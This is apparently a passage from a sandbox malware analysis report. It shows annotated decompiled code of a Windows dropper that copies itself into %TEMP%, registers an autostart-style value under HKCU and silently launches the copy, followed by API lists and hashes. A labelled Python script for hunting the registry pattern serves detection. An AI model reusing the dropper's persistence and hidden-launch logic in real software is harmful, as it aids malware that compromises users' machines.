                                                                                                                                  														lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8)); // append a runtime-decoded 4-byte token (contents not recoverable here)
                                                                                                                                  														E0040EE2A(_v40, _t459, 0, _t454);
                                                                                                                                  														_t469 = _t469 + 0x20;
                                                                                                                                  														__eflags = _v372 - 0x22;
                                                                                                                                  														if(_v372 != 0x22) { // quote the original path unless it already starts with '"'
                                                                                                                                  															lstrcatA( &_v1272, "\"");
                                                                                                                                  														}
                                                                                                                                  														lstrcatA( &_v1272,  &_v372);
                                                                                                                                  														__eflags = _v372 - 0x22;
                                                                                                                                  														if(_v372 != 0x22) {
                                                                                                                                  															lstrcatA( &_v1272, "\"");
                                                                                                                                  														}
                                                                                                                                  														_v36 = 1; // success flag consulted at L83
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										__eflags = _v32;
                                                                                                                                  										if(_v32 != 0) {
                                                                                                                                  											__eflags = _v28;
                                                                                                                                  											if(_v28 != 0) {
                                                                                                                                  												wsprintfA( &_v372, "%X%08X", _v28, _v32); // 64-bit value loaded from globals 0x412180/0x41217c, rendered as uppercase hex
                                                                                                                                  												lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8)); // another runtime-decoded 4-byte token
                                                                                                                                  												E0040EE2A(_t438, _t459, 0, _t454);
                                                                                                                                  												_t469 = _t469 + 0x30;
                                                                                                                                  												lstrcatA( &_v1272,  &_v372); // resulting command line: "<dropped>" <token> "<original>" <token> <HEX>
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64); // 0x8000000 == CREATE_NO_WINDOW: start the dropped copy without a console window
                                                                                                                                  										__eflags = _t344;
                                                                                                                                  										if(_t344 == 0) {
                                                                                                                                  											DeleteFileA( &_v672); // launch failed: remove the dropped file and clear the success flag
                                                                                                                                  											_v36 = 0;
                                                                                                                                  										}
                                                                                                                                  										__eflags = _v16 - 1;
                                                                                                                                  										if(_v16 == 1) {
                                                                                                                                  											__eflags = _v20;
                                                                                                                                  											if(_v20 == 0) {
                                                                                                                                  												E004096FF(_t438);
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										goto L82;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _v112;
                                                                                                                                  									if(_v112 != 0) {
                                                                                                                                  										goto L61;
                                                                                                                                  									}
                                                                                                                                  									goto L60;
                                                                                                                                  								}
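The branch above assembles one registry value under HKEY_CURRENT_USER whose data is a command line of the shape `"<dropped path>" <token> "<original image path>" <token> <HEX>`, with the value name generated at runtime and the key path and both 4-byte tokens decoded at runtime, none of which is visible in this listing. The following is an added hunting example, not code from the sample or from this Joe Sandbox report. It runs offline on constructed REG_SZ values and keys on the structural traits the routine produces (image under %TEMP% or another user-writable directory, a second quoted .exe path among the arguments, a trailing `%X%08X`-style hex token) rather than on the unknown names or tokens. That the key is an autostart location such as `HKCU\...\Run`, and the extra directories beyond %TEMP%, are assumptions.

```python
"""Offline heuristic for the command-line shape the dropper builds.

Added hunting example, not code from the sample or from the Joe Sandbox
report.  Input is a mapping of value name -> REG_SZ data as exported from an
autostart key under HKCU (assumed location); the sample values below are
constructed.  The two 4-character tokens, the value name and the key path are
decoded/generated at runtime and are not visible in the listing, so nothing
here depends on their actual contents.
"""
import re
from typing import Dict, List, Tuple

# Drop directories: GetTempPathA comes straight from the listing; the other
# entries widen the net and are an assumption.
USER_WRITABLE_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\local\\",
    "\\appdata\\roaming\\",
    "\\users\\public\\",
)
ABS_EXE = re.compile(r"^[a-z]:\\.+\.exe$", re.IGNORECASE)
# wsprintfA("%X%08X", hi, lo) with hi != 0 yields 9 to 16 uppercase hex digits
HEX_SUFFIX = re.compile(r"^[0-9A-F]{9,16}$")


def split_cmdline(value: str) -> List[Tuple[str, bool]]:
    """Tokenise a command line the way the dropper quotes it: whole paths
    wrapped in double quotes, everything else separated by whitespace.
    Returns (token, was_quoted) pairs with the quotes stripped."""
    tokens: List[Tuple[str, bool]] = []
    buf: List[str] = []
    in_quotes = seen_quote = False
    for ch in value:
        if ch == '"':
            in_quotes = not in_quotes
            seen_quote = True
        elif ch.isspace() and not in_quotes:
            if buf or seen_quote:
                tokens.append(("".join(buf), seen_quote))
                buf, seen_quote = [], False
        else:
            buf.append(ch)
    if buf or seen_quote:
        tokens.append(("".join(buf), seen_quote))
    return tokens


def assess(value: str) -> Dict[str, object]:
    """Flag a value when its image sits in a user-writable directory AND the
    arguments carry at least one trait the routine adds: a second quoted .exe
    path (the original module, only appended when it is not on a removable
    drive) or the trailing %X%08X token (only appended when both globals are
    non-zero).  Either trait may be absent, so one of them is enough."""
    tokens = split_cmdline(value)
    if not tokens:
        return {"flagged": False, "reasons": []}
    image = tokens[0][0]
    reasons: List[str] = []
    in_writable = bool(ABS_EXE.match(image)) and any(
        d in image.lower() for d in USER_WRITABLE_DIRS)
    if in_writable:
        reasons.append("image in user-writable directory")
    for tok, quoted in tokens[1:]:
        if quoted and ABS_EXE.match(tok):
            reasons.append(f"second executable path as argument: {tok}")
            break
    if len(tokens) > 1 and HEX_SUFFIX.match(tokens[-1][0]):
        reasons.append("trailing %X%08X-style token")
    return {"flagged": in_writable and len(reasons) >= 2, "reasons": reasons}


def hunt(values: Dict[str, str]) -> List[str]:
    """Return the names of the values matching the dropper's shape."""
    return [name for name, data in values.items() if assess(data)["flagged"]]


# Constructed sample (not from the report): value name -> REG_SZ data.
SAMPLE_HKCU_VALUES = {
    "OneDrive": r'"C:\Users\analyst\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
    # dropped to %TEMP%, original path handed over (fixed drive), hex token present
    "qwmxbv": r'"C:\Users\analyst\AppData\Local\Temp\qwmxbv.exe" abcd "D:\share\OcmKX57vR7.exe" efgh 1A2B3C4D5',
    # original sat on a removable drive, so only the hex token follows
    "rtkpls": r'"C:\Users\analyst\AppData\Local\Temp\rtkpls.exe" abcd efgh 7F00000001',
    # in %TEMP% but with neither argument trait: not flagged
    "updater": r'"C:\Users\analyst\AppData\Local\Temp\setup_helper.exe" /quiet',
}

if __name__ == "__main__":
    for name, data in SAMPLE_HKCU_VALUES.items():
        verdict = assess(data)
        print(f"{name:15} {'FLAG' if verdict['flagged'] else 'ok  '} {verdict['reasons']}")
```

Because the value name and key path are generated or decoded at runtime, hunt on the data shape and the image location rather than on names; a hit is a lead, to be confirmed by hashing the image and comparing it with the dropped-file hashes the report records.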
                                                                                                                                  								_t379 = GetTempPathA(0x1f4,  &_v1272); // default drop directory: %TEMP% (buffer 0x1f4 == 500 bytes)
                                                                                                                                  								_t494 = _t379;
                                                                                                                                  								if(_t379 == 0) {
                                                                                                                                  									goto L55; // fall back to the directory named by the environment variable
                                                                                                                                  								}
                                                                                                                                  								_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12); // executed; appears to write the _v8/_v12 buffer into that directory, with the dropped path in _v672 (the path later quoted on the command line and deleted on failure)
                                                                                                                                  								_t467 = _t467 + 0x14;
                                                                                                                                  								if(_t383 == 0) {
                                                                                                                                  									goto L55;
                                                                                                                                  								}
                                                                                                                                  								_v80 = 0;
                                                                                                                                  								if(_v16 < 3 || _v372 == 0) {
                                                                                                                                  									_push(0);
                                                                                                                                  									_push( &_v80);
                                                                                                                                  									_push(E00406DC2(_t438) ^ 0x5e5e5e5e); // same seed ^ 0x5e5e5e5e as for the registry value name ...
                                                                                                                                  									E0040F133(); // ... here generating a name into _v80
                                                                                                                                  									_t474 = _t467 + 0xc;
                                                                                                                                  									lstrcpyA( &_v372, E00406CC9(_t438)); // _v372 = <prefix> + <generated name> + <static suffix at E0041070C>
                                                                                                                                  									lstrcatA( &_v372,  &_v80);
                                                                                                                                  									lstrcatA( &_v372,  &E0041070C);
                                                                                                                                  									_t396 = 0;
                                                                                                                                  									__eflags = 0;
                                                                                                                                  									goto L43;
                                                                                                                                  								} else {
                                                                                                                                  									_t410 =  &_v372;
                                                                                                                                  									_t450 = _t410 + 1;
                                                                                                                                  									do { // inline strlen(_v372)
                                                                                                                                  										_t441 =  *_t410;
                                                                                                                                  										_t410 = _t410 + 1;
                                                                                                                                  									} while (_t441 != 0);
                                                                                                                                  									_t411 = _t410 - _t450;
                                                                                                                                  									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) { // drop a trailing '\' (0x5c)
                                                                                                                                  										_t411 = _t411 - 1;
                                                                                                                                  									}
                                                                                                                                  									_t451 = _t411;
                                                                                                                                  									if(_t411 <= 0) {
                                                                                                                                  										L41:
                                                                                                                                  										_t449 = _t451 - _t411;
                                                                                                                                  										_a12 = _t451 - _t411;
                                                                                                                                  										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411); // memcpy-like: copy the tail of _v372 (from offset _t411) into _v80
                                                                                                                                  										 *((char*)(_t464 + _a12 - 0x4c)) = 0; // NUL-terminate _v80
                                                                                                                                  										_t474 = _t467 + 0xc;
                                                                                                                                  										_t396 = 1;
                                                                                                                                  										L43:
                                                                                                                                  										if(_v44 == 0 || _v48 < 0x50) {
                                                                                                                                  											_t438 = 1;
                                                                                                                                  											__eflags = 1;
                                                                                                                                  										} else {
                                                                                                                                  											_t438 = 0;
                                                                                                                                  										}
                                                                                                                                  										_push(_t438);
                                                                                                                                  										_push(_t396);
                                                                                                                                  										_push( &_v372);
                                                                                                                                  										_push( &_v80);
                                                                                                                                  										_push( &_v672);
                                                                                                                                  										_push( &_v704);
                                                                                                                                  										_t401 = E00409326(_t438, _t449);
                                                                                                                                  										_t467 = _t474 + 0x18;
                                                                                                                                  										if(_t401 == 0) {
                                                                                                                                  											_t402 =  *0x41217c; // 0x0
                                                                                                                                  											_v32 = _t402;
                                                                                                                                  											_t403 =  *0x412180; // 0x0
                                                                                                                                  											goto L54;
                                                                                                                                  										} else {
                                                                                                                                  											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
                                                                                                                                  												_t403 = 0x5e0d0108;
                                                                                                                                  												 *0x412180 = 0x5e0d0108;
                                                                                                                                  												 *0x41217c = 0;
                                                                                                                                  												_v32 = 0;
                                                                                                                                  												L54:
                                                                                                                                  												_v28 = _t403;
                                                                                                                                  												DeleteFileA( &_v672);
                                                                                                                                  												goto L55;
                                                                                                                                  											}
                                                                                                                                  											_t459 = 1;
                                                                                                                                  											if(_v16 == 1) {
                                                                                                                                  												E004096FF(_t438);
                                                                                                                                  											}
                                                                                                                                  											_v36 = _t459;
                                                                                                                                  											goto L83;
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										_t442 =  &_v372;
                                                                                                                                  										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
                                                                                                                                  											_t411 = _t411 - 1;
                                                                                                                                  											if(_t411 > 0) {
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											goto L41;
                                                                                                                                  										}
                                                                                                                                  										goto L41;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t417 = _v8;
                                                                                                                                  					_t454 = _t417 + 3;
                                                                                                                                  					_v372 = 0;
                                                                                                                                  					if( *((char*)(_t417 + 3)) != 0x22) {
                                                                                                                                  						_t418 = E0040ED03(_t454, 0x20);
                                                                                                                                  						_pop(_t438);
                                                                                                                                  						__eflags = _t418;
                                                                                                                                  						if(_t418 == 0) {
                                                                                                                                  							_t418 =  &(_a12[lstrlenA(_a12)]);
                                                                                                                                  							__eflags = _t418;
                                                                                                                                  						}
                                                                                                                                  						_t459 = _t418 - _v8;
                                                                                                                                  						__eflags = _t459;
                                                                                                                                  						E0040EE08( &_v372, _t454, _t459 - 3);
                                                                                                                                  						 *((char*)(_t464 + _t459 - 0x173)) = 0;
                                                                                                                                  						L13:
                                                                                                                                  						_t467 = _t467 + 0xc;
                                                                                                                                  						L14:
                                                                                                                                  						if(_v372 != 0 && _v672 != 0) {
                                                                                                                                  							_t424 = E0040675C( &_v672,  &_v12, 0);
                                                                                                                                  							_t467 = _t467 + 0xc;
                                                                                                                                  							if(_t424 != 0 && _v12 != 0) {
                                                                                                                                  								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
                                                                                                                                  								_t467 = _t467 + 0xc;
                                                                                                                                  								_v12 = _t426;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L19;
                                                                                                                                  					}
                                                                                                                                  					_t454 = _t417 + 4;
                                                                                                                                  					_t428 = E0040ED03(_t417 + 4, 0x22);
                                                                                                                                  					_pop(_t438);
                                                                                                                                  					if(_t428 == 0) {
                                                                                                                                  						goto L14;
                                                                                                                                  					} else {
                                                                                                                                  						_t459 = _t428 - _v8;
                                                                                                                                  						E0040EE08( &_v372, _t454, _t459 - 4);
                                                                                                                                  						 *((char*)(_t464 + _t459 - 0x174)) = 0;
                                                                                                                                  						goto L13;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x0040a325
                                                                                                                                  0x0040a327
                                                                                                                                  0x0040a339
                                                                                                                                  0x0040a33b
                                                                                                                                  0x0040a33d
                                                                                                                                  0x0040a340
                                                                                                                                  0x0040a344
                                                                                                                                  0x0040a344
                                                                                                                                  0x0040a34c
                                                                                                                                  0x0040a351
                                                                                                                                  0x0040a354
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a354
                                                                                                                                  0x0040a329
                                                                                                                                  0x0040a32b
                                                                                                                                  0x0040a32e
                                                                                                                                  0x0040a32e
                                                                                                                                  0x0040a330
                                                                                                                                  0x0040a331
                                                                                                                                  0x0040a331
                                                                                                                                  0x0040a337
                                                                                                                                  0x0040a337
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a337
                                                                                                                                  0x0040a228
                                                                                                                                  0x0040a22b
                                                                                                                                  0x0040a231
                                                                                                                                  0x0040a234
                                                                                                                                  0x0040a237
                                                                                                                                  0x0040a27a
                                                                                                                                  0x0040a280
                                                                                                                                  0x0040a281
                                                                                                                                  0x0040a283
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a291
                                                                                                                                  0x0040a294
                                                                                                                                  0x0040a297
                                                                                                                                  0x0040a2a5
                                                                                                                                  0x0040a2ad
                                                                                                                                  0x0040a2b4
                                                                                                                                  0x0040a2b4
                                                                                                                                  0x0040a2b7
                                                                                                                                  0x0040a2b7
                                                                                                                                  0x0040a2bd
                                                                                                                                  0x0040a2d0
                                                                                                                                  0x0040a2d5
                                                                                                                                  0x0040a2d5
                                                                                                                                  0x0040a2d8
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a2d8
                                                                                                                                  0x0040a242
                                                                                                                                  0x0040a245
                                                                                                                                  0x0040a24b
                                                                                                                                  0x0040a24c
                                                                                                                                  0x0040a24e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a253
                                                                                                                                  0x0040a264
                                                                                                                                  0x0040a26c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a26c
                                                                                                                                  0x00409c39
                                                                                                                                  0x00409c3f
                                                                                                                                  0x0040a167
                                                                                                                                  0x0040a183
                                                                                                                                  0x0040a190
                                                                                                                                  0x0040a196
                                                                                                                                  0x0040a198
                                                                                                                                  0x0040a198
                                                                                                                                  0x0040a1a2
                                                                                                                                  0x0040a1b3
                                                                                                                                  0x0040a1b6
                                                                                                                                  0x0040a1bc
                                                                                                                                  0x0040a1bf
                                                                                                                                  0x0040a1c7
                                                                                                                                  0x0040a1cc
                                                                                                                                  0x0040a1cc
                                                                                                                                  0x0040a1bf
                                                                                                                                  0x0040a1a2
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c54
                                                                                                                                  0x00409c56
                                                                                                                                  0x00409c5b
                                                                                                                                  0x00409c62
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c74
                                                                                                                                  0x00409c79
                                                                                                                                  0x00409c7c
                                                                                                                                  0x00409c81
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c90
                                                                                                                                  0x00409c94
                                                                                                                                  0x00409c97
                                                                                                                                  0x00409c9a
                                                                                                                                  0x00409e3e
                                                                                                                                  0x00409e3e
                                                                                                                                  0x00409e42
                                                                                                                                  0x0040a155
                                                                                                                                  0x0040a158
                                                                                                                                  0x0040a15d
                                                                                                                                  0x0040a161
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a161
                                                                                                                                  0x00409e66
                                                                                                                                  0x00409e6b
                                                                                                                                  0x00409e75
                                                                                                                                  0x00409e77
                                                                                                                                  0x0040a14a
                                                                                                                                  0x0040a14d
                                                                                                                                  0x0040a152
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a152
                                                                                                                                  0x00409e98
                                                                                                                                  0x00409e9d
                                                                                                                                  0x00409ea0
                                                                                                                                  0x00409ea2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409eab
                                                                                                                                  0x00409eb0
                                                                                                                                  0x00409ec1
                                                                                                                                  0x00409ec8
                                                                                                                                  0x00409ed5
                                                                                                                                  0x00409edb
                                                                                                                                  0x00409ee3
                                                                                                                                  0x00409ee4
                                                                                                                                  0x00409ee8
                                                                                                                                  0x00409eeb
                                                                                                                                  0x00409ef2
                                                                                                                                  0x00409ef9
                                                                                                                                  0x00409efc
                                                                                                                                  0x00409efd
                                                                                                                                  0x00409f03
                                                                                                                                  0x00409f03
                                                                                                                                  0x00409f08
                                                                                                                                  0x00409f09
                                                                                                                                  0x00409f0e
                                                                                                                                  0x00409f11
                                                                                                                                  0x00409f2d
                                                                                                                                  0x00409f32
                                                                                                                                  0x00409f3b
                                                                                                                                  0x00409f41
                                                                                                                                  0x00409f44
                                                                                                                                  0x00409f46
                                                                                                                                  0x00409f4b
                                                                                                                                  0x00409f4b
                                                                                                                                  0x00409f67
                                                                                                                                  0x00409f6a
                                                                                                                                  0x00409f6a
                                                                                                                                  0x00409f73
                                                                                                                                  0x00409f82
                                                                                                                                  0x00409f8e
                                                                                                                                  0x00409f98
                                                                                                                                  0x00409f9d
                                                                                                                                  0x00409fb4
                                                                                                                                  0x00409fba
                                                                                                                                  0x00409fbc
                                                                                                                                  0x00409fc2
                                                                                                                                  0x00409fc9
                                                                                                                                  0x00409fcf
                                                                                                                                  0x00409fd2
                                                                                                                                  0x00409fd4
                                                                                                                                  0x00409fda
                                                                                                                                  0x00409fda
                                                                                                                                  0x00409fdd
                                                                                                                                  0x00409fe1
                                                                                                                                  0x00409fe7
                                                                                                                                  0x00409feb
                                                                                                                                  0x00409ff1
                                                                                                                                  0x00409ff4
                                                                                                                                  0x00409ff8
                                                                                                                                  0x00409ffb
                                                                                                                                  0x00409ffe
                                                                                                                                  0x0040a004
                                                                                                                                  0x0040a007
                                                                                                                                  0x0040a010
                                                                                                                                  0x0040a025
                                                                                                                                  0x0040a038
                                                                                                                                  0x0040a041
                                                                                                                                  0x0040a046
                                                                                                                                  0x0040a049
                                                                                                                                  0x0040a050
                                                                                                                                  0x0040a05e
                                                                                                                                  0x0040a05e
                                                                                                                                  0x0040a072
                                                                                                                                  0x0040a078
                                                                                                                                  0x0040a07f
                                                                                                                                  0x0040a08d
                                                                                                                                  0x0040a08d
                                                                                                                                  0x0040a093
                                                                                                                                  0x0040a093

APIs
• SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
• SetErrorMode.KERNELBASE(00000003), ref: 00409A83
• SetUnhandledExceptionFilter.KERNELBASE(00406511), ref: 00409A8A
  • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
  • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
  • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
• GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
• GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
• GetCommandLineA.KERNEL32 ref: 00409AFD
• lstrlenA.KERNEL32(?), ref: 00409B99
• ExitProcess.KERNEL32 ref: 00409C06
• GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
• lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
• lstrcatA.KERNEL32(?,?), ref: 00409D8B
• lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
• GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
• DeleteFileA.KERNEL32(00000022), ref: 00409E38
• GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
• lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
• lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
• RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
• GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
• GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
• GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
• lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
• lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
• lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
• lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
• wsprintfA.USER32 ref: 0040A0B6
• lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
• lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
• CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
• DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
• GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
• GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
• GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
• GetCommandLineA.KERNEL32 ref: 0040A1E5
  • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
  • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
  • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
• lstrlenA.KERNEL32(?), ref: 0040A288
• StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
• GetLastError.KERNEL32 ref: 0040A3ED
• Sleep.KERNEL32(000003E8), ref: 0040A400
• DeleteFileA.KERNEL32(004133D8), ref: 0040A407
• CreateThread.KERNEL32 ref: 0040A42C
• WSAStartup.WS2_32(00001010,?), ref: 0040A43A
• CreateThread.KERNEL32 ref: 0040A469
• Sleep.KERNEL32(00000BB8), ref: 0040A48A
• GetTickCount.KERNEL32 ref: 0040A49F
• GetTickCount.KERNEL32 ref: 0040A4B7
• Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                                                                  • String ID: "$"$"$%X%08X$0 v$D$P$PromptOnSecureDesktop$\
                                                                                                                                  • API String ID: 2089075347-2566440486
                                                                                                                                  • Opcode ID: c894b1530cc35010d23fccc7ef5158d33aa5e0c8bcfee394fb4dde1fc96a0a24
                                                                                                                                  • Instruction ID: 03c383f258a4670438db1d87b8f5ad655fb57d32e75deaea02eb898f73f6b462
                                                                                                                                  • Opcode Fuzzy Hash: c894b1530cc35010d23fccc7ef5158d33aa5e0c8bcfee394fb4dde1fc96a0a24
                                                                                                                                  • Instruction Fuzzy Hash: EC5291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 497 409326-409348 call 401910 GetVersionExA 500 409358-40935c 497->500 501 40934a-409356 497->501 502 409360-40937d GetModuleHandleA GetModuleFileNameA 500->502 501->502 503 409385-4093a2 502->503 504 40937f 502->504 505 4093a4-4093d7 call 402544 wsprintfA 503->505 506 4093d9-409412 call 402544 wsprintfA 503->506 504->503 511 409415-40942c call 40ee2a 505->511 506->511 514 4094a3-4094b3 call 406edd 511->514 515 40942e-409432 511->515 520 4094b9-4094f9 call 402544 RegOpenKeyExA 514->520 521 40962f-409632 514->521 515->514 516 409434-4094a0 call 406cc9 call 40ef00 call 402544 call 40ef1e call 402544 wsprintfA call 40ee2a 515->516 516->514 531 409502-40952e call 402544 RegQueryValueExA 520->531 532 4094fb-409500 520->532 523 409634-409637 521->523 526 409639-40964a call 401820 523->526 527 40967b-409682 523->527 540 40964c-409662 526->540 541 40966d-409679 526->541 534 409683 call 4091eb 527->534 550 409530-409537 531->550 551 409539-409565 call 402544 RegQueryValueExA 531->551 536 40957a-40957f 532->536 544 409688-409690 534->544 545 409581-409584 536->545 546 40958a-40958d 536->546 548 409664-40966b 540->548 549 40962b-40962d 540->549 541->534 553 409692 544->553 554 409698-4096a0 544->554 545->523 545->546 546->527 547 409593-40959a 546->547 555 40961a-40961f 547->555 556 40959c-4095a1 547->556 548->549 560 4096a2-4096a9 549->560 557 40956e-409577 RegCloseKey 550->557 551->557 566 409567 551->566 553->554 554->560 564 409625 555->564 556->555 561 4095a3-4095c0 call 40f0e4 556->561 557->536 570 4095c2-4095db call 4018e0 561->570 571 40960c-409618 561->571 564->549 566->557 570->560 574 4095e1-4095f9 570->574 571->564 574->560 575 4095ff-409607 574->575 575->560
                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                  			E00409326(void* __ecx, void* __edx) {
                                                                                                                                  				void* __ebx;
                                                                                                                                  				char _t88;
                                                                                                                                  				void* _t89;
                                                                                                                                  				int _t92;
                                                                                                                                  				void* _t96;
                                                                                                                                  				signed int _t97;
                                                                                                                                  				signed int _t100;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				char* _t106;
                                                                                                                                  				long _t107;
                                                                                                                                  				char* _t111;
                                                                                                                                  				signed int _t112;
                                                                                                                                  				char* _t116;
                                                                                                                                  				signed int _t117;
                                                                                                                                  				int _t119;
                                                                                                                                  				void* _t146;
                                                                                                                                  				signed int _t155;
                                                                                                                                  				int _t161;
                                                                                                                                  				signed int _t165;
                                                                                                                                  				signed int _t167;
                                                                                                                                  				void* _t168;
                                                                                                                                  				void* _t170;
                                                                                                                                  				void* _t172;
                                                                                                                                  				void* _t173;
                                                                                                                                  				void* _t175;
                                                                                                                                  				void* _t176;
                                                                                                                                  
                                                                                                                                  				_t146 = __ecx;
                                                                                                                                  				_t168 = _t170 - 0x60;
                                                                                                                                  				E00401910(0x19bc);
                                                                                                                                  				 *(_t168 - 0x58) = 0x9c;
                                                                                                                                  				if(GetVersionExA(_t168 - 0x58) == 0) {
                                                                                                                                  					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
                                                                                                                                  					_t9 = _t168 + 0x58;
                                                                                                                                  					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
                                                                                                                                  					__eflags =  *_t9;
                                                                                                                                  				} else {
                                                                                                                                  					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
                                                                                                                                  				}
                                                                                                                                  				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
                                                                                                                                  				if(_t88 == 0) {
                                                                                                                                  					 *(_t168 - 0x15c) = _t88;
                                                                                                                                  				}
                                                                                                                                  				_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  				_t89 = _t168 - 0x15c;
                                                                                                                                  				if( *(_t168 + 0x78) == 0) {
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                                                                  					_push(_t89);
                                                                                                                                  					_push( *((intOrPtr*)(_t168 + 0x68)));
